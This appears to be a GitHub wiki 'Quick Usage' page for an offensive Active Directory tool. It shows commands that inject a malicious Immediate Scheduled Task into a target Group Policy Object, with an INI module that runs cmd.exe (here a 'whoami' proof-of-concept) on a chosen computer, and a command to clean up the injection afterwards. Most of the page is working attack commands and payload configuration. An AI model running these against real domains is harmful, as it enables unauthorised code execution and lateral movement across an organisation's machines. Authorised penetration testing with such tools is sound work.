-
Notifications
You must be signed in to change notification settings - Fork 32
02_Quick Usage
If you are in a rush, chances are that you simply want to exploit a GPO by injecting a malicious configuration into it.
Here is an example of a gpo > inject command that adds an Immediate Task to your target GPO:
$ python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'The injected Immediate Task is described by the ImmediateTask_create.ini INI file, in which you provide its options. Several examples are provided in the modules_templates folder. If you want your Immediate Task to execute a cmd.exe command, and to only be deployed on the ad01-srv.corp.com computer:
[MODULECONFIG]
name = Scheduled Tasks
type = computer
[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"
[MODULEFILTERS]
filters =
[{
"operator": "AND",
"type": "Computer Name",
"value": "ad01-srv1.corp.com"
}]
Once you are finished (e.g. your Immediate Task was executed by the target), you may remove the injected configuration from the GPO by running the gpo > clean command, which takes the state_folder generated by the previous gpo > inject command.
$ python3 gpb.py gpo clean --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --state-folder 'state_folders/2025_07_15_075047'
For more complex exploitation scenarios and more details regarding the commands available to you, we encourage you to refer to the 03_Usage section. For more information regarding modules, available configurations for each of them, and filters options, see the 04_Modules and 05_Modules configurations sections.